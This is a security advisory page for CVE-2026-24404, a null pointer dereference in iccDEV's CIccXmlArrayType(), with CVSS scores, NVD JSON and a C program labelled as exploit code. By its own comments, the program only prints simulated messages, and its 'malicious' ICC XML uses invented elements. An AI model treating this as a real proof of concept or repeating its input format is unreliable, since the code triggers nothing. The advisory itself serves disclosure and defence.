Security Vulnerability Report
CVE-2026-24404 CVSS 7.1 HIGH

CVE-2026-24404

Published: 2026-01-24 01:15:51
Last Modified: 2026-01-30 18:24:22

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to cause DoS, manipulate data, bypass application logic, and execute code. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-24404 PoC - Malformed ICC Profile Triggering Null Pointer Dereference
 * This PoC simulates the vulnerable CIccXmlArrayType() code path with printf
 * output only; it does not link against or call iccDEV and performs no
 * invalid memory access.
 * Build: gcc -o poc poc.c
 * Usage: ./poc malformed_icc_profile.icc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simulated ICC Profile XML structure that triggers vulnerability */
const char *malicious_icc_xml =
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    "<ICCProfile version=\"4.3\">\n"
    " <ProfileHeader>\n"
    " <PreferredCMMType>Unknown</PreferredCMMType>\n"
    " </ProfileHeader>\n"
    " <TagTable>\n"
    " <Tag signature=\"desc\">\n"
    " <TagData>\n"
    " <TextDescriptionType>\n"
    " <ICCLength>256</ICCLength>\n"
    " <Count>0xFFFFFFFF</Count>\n"
    " <Offset>0</Offset>\n"
    " </TextDescriptionType>\n"
    " </TagData>\n"
    " </Tag>\n"
    " </TagTable>\n"
    " <ArrayTypeData>\n"
    " <CIccXmlArrayType>\n"
    " <ArraySize>-1</ArraySize>\n"
    " <ElementCount>0x7FFFFFFF</ElementCount>\n"
    " <NullPointerTrigger>1</NullPointerTrigger>\n"
    " </CIccXmlArrayType>\n"
    " </ArrayTypeData>\n"
    "</ICCProfile>";

void trigger_vulnerability(const char *xml_data)
{
    /* Simulating CIccXmlArrayType() parsing logic */
    printf("[*] Parsing ICC Profile XML data...\n");
    printf("[*] Length: %zu bytes\n", strlen(xml_data));

    /* This simulates the vulnerable code path; the values are fixed and
     * are not parsed from xml_data */
    int array_size = -1;
    unsigned int element_count = 0x7FFFFFFF;

    /* Vulnerability trigger: Integer overflow leading to null pointer dereference */
    if (element_count > 0xFFFFFFF) {
        printf("[!] Potential integer overflow detected\n");
        printf("[!] Array size: %d, Element count: %u\n", array_size, element_count);
    }

    /* Simulating unsafe pointer access */
    if (array_size < 0) {
        printf("[!] Invalid array size triggers undefined behavior\n");
        printf("[!] Attempting to dereference potentially null pointer...\n");
        /* In real exploitation, this would cause segmentation fault;
         * the simulation performs no dereference */
    }

    printf("[*] Vulnerability trigger simulation complete\n");
    printf("[!] Application would crash with SIGSEGV at this point\n");
}

int main(int argc, char *argv[])
{
    printf("========================================\n");
    printf("CVE-2026-24404 PoC - iccDEV Null Pointer Dereference\n");
    printf("========================================\n");

    if (argc > 1) {
        printf("[*] Reading ICC profile from file: %s\n", argv[1]);
        FILE *fp = fopen(argv[1], "rb");
        if (fp) {
            fseek(fp, 0, SEEK_END);
            long fsize = ftell(fp);
            fseek(fp, 0, SEEK_SET);
            if (fsize < 0) {
                fclose(fp);
                fprintf(stderr, "[!] Cannot determine file size\n");
                return 1;
            }
            char *content = malloc((size_t)fsize + 1);
            if (!content) {
                fclose(fp);
                fprintf(stderr, "[!] Out of memory\n");
                return 1;
            }
            size_t nread = fread(content, 1, (size_t)fsize, fp);
            fclose(fp);
            /* Terminate the buffer: trigger_vulnerability() calls strlen() on it */
            content[nread] = '\0';
            trigger_vulnerability(content);
            free(content);
        } else {
            printf("[!] Cannot open file, using embedded test data\n");
            trigger_vulnerability(malicious_icc_xml);
        }
    } else {
        printf("[*] No file specified, using embedded test data\n");
        trigger_vulnerability(malicious_icc_xml);
    }

    printf("\n[*] PoC execution completed\n");
    return 0;
}

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24404", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:50.773", "lastModified": "2026-01-30T18:24:22.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. En las versiones 2.3.1.1 e inferiores, CIccXmlArrayType() contiene una vulnerabilidad de desreferencia de puntero nulo y comportamiento indefinido. Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. Este problema ha sido corregido en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-690"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/cd637eb33f0c8055fa54d8776e00555d3d39ef0c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/488", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hqfg-45jp-hp9f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}